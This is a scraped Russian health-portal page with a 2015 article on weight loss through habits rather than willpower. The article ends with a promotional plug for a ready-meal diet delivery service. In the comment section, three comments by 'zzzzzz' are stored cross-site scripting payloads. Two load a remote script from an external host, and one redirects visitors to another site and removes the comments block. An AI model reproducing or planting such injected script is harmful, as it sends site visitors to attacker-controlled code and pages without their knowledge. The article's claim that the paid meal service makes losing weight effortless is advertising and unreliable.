Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сколько воли нужно, чтобы...  >>  Сколько воли нужно, чтобы похудеть?
 
Обратная связь
 

Сколько воли нужно, чтобы похудеть?

Размер шрифта
23 марта 2015 00:00
  • google_analytics: false
  • Нравится

Сила воли позволяет нам устоять перед вкусной и калорийной едой и худеть. Однако на одной только силе воли далеко не уедешь, утверждают специалисты. Почему? Мотивация к похудению со временем угасает, и килограммы возвращаются обратно. Для успешного похудения нужно превратить здоровое питание в привычку.

Сколько воли нужно, чтобы похудеть?

Пересмотр ценностей

Чтобы научить себя питаться правильно на всю оставшуюся жизнь, вам нужно пересмотреть свое отношение к еде и похудению. В идеале со временем вы станете менее зависимым от еды. Ваша цель – избавиться от нездоровых перекусов и уменьшить размеры порций.

С глаз долой

Устоять перед вредной едой непросто, поэтому наиболее эффективный способ не сорваться – просто не покупать ее. Если кто-то из домашних не придерживается здорового питания, старайтесь, чтобы его продукты не попадались вам на глаза.

Разноцветная еда

Старайтесь, чтобы в вашем доме в большом разнообразии были здоровые продукты, которые не нужно долго готовить. Положите их в холодильник, на полки, в чулан, чтобы они чаще попадались вам на глаза. Например, окружите себя помытыми и очищенными разноцветными фруктами и овощами. Они не только помогут похудеть, но и улучшат настроение разнообразными цветами.

Никаких голоданий

Не оставляйте себя без еды слишком надолго. 4-5 часов без перекусов приводят к сильному голоду и последующему перееданию. В то же время старайтесь проводить больше времени вдали от мест, где вы можете объесться.

Диета Елены Малышевой

«Диета Елены Малышевой» – это готовая еда для похудения. Вам не надо будет считать калорий, думать, что купить и приготовить, и даже силу воли напрягать не обязательно. Уже готовую еду вам доставят в любое удобное место и время. Вам останется только есть и худеть!

Хотите узнать еще больше о том, как успешно похудеть? Читайте наш спецпроект «Сбрось лишнее».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:17

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Три типа ожирения   С каждым годом набираете все больше и больше веса? Во всем виноват ваш язык!   5 неожиданных причин, почему вы толстеете   Не выспались? Вы потолстеете!  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как не сорваться на диете и похудеть?
Как устоять перед соблазнами?
7 вопросов, чтобы похудеть!

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.